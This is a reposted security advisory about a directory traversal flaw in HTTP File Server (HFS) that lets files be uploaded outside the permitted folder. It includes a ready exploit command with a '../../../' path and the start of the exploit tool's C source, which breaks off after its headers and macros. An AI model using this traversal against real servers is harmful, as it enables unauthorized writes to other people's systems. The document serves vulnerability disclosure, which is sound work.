- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
HTTP File Server Upload Directory Traversal
------------------------------------------------------------------------
SUMMARY
<http://www.rejetto.com/hfs/> HFS is "an HTTP File Server that can be to
send and receive files". A directory traversal vulnerability in HFS allows
remote attackers to upload files to locations that reside outside the
bounding HTTP root directory.
DETAILS
Vulnerable Systems:
* HTTP File Server (HFS) version 2.2a and prior
* HTTP File Server (HFS) version 2.3beta and prior
Immune Systems:
* HTTP File Server (HFS) version 2.2b #150
* HTTP File Server (HFS) version 2.3 beta #160
HFS allows the uploading of files to the real folders added to the Virtual
File System. The problem is that an attacker can upload files outside the
destination folder reaching the root or any other directory on the disk in
which is located the upload folder using the ../ pattern.
Note that uploading must be enabled on the target folder, that the
attacker must have access to it (is possible to restrict the access to
that folder to a specific account) and that is not possible to overwrite
existing files because the server avoids it (for example if a file called
file.txt already exists the new one will be called file(1).txt).
Exploit:
Download myhttpup from: <http://aluigi.org/testz/myhttpup.zip>
http://aluigi.org/testz/myhttpup.zip and run:
myhttpup http://SERVER/folder file.txt ../../../file.txt
(The code of myhttpup.zip has been pasted below)
mydownlib.c:
/*
mydownlib
by Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
Copyright 2006,2007 Luigi Auriemma
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA
http://www.gnu.org/licenses/gpl.txt
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <sys/stat.h>
#include <time.h>
#include <ctype.h>
#include <zlib.h>
#include "mydownlib.h"
#ifdef WIN32
#include <winsock.h>
#define close closesocket
#define in_addr_t uint32_t
#define TEMPOZ1
#define TEMPOZ2 GetTickCount()
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/times.h>
#include <sys/timeb.h>
#define stristr strcasestr
#define stricmp strcasecmp
#define strnicmp strncasecmp
#define TEMPOZ1 ftime(&timex)
#define TEMPOZ2 ((timex.time * 1000) + timex.millitm)
#define ONESEC 1
No comments:
Post a Comment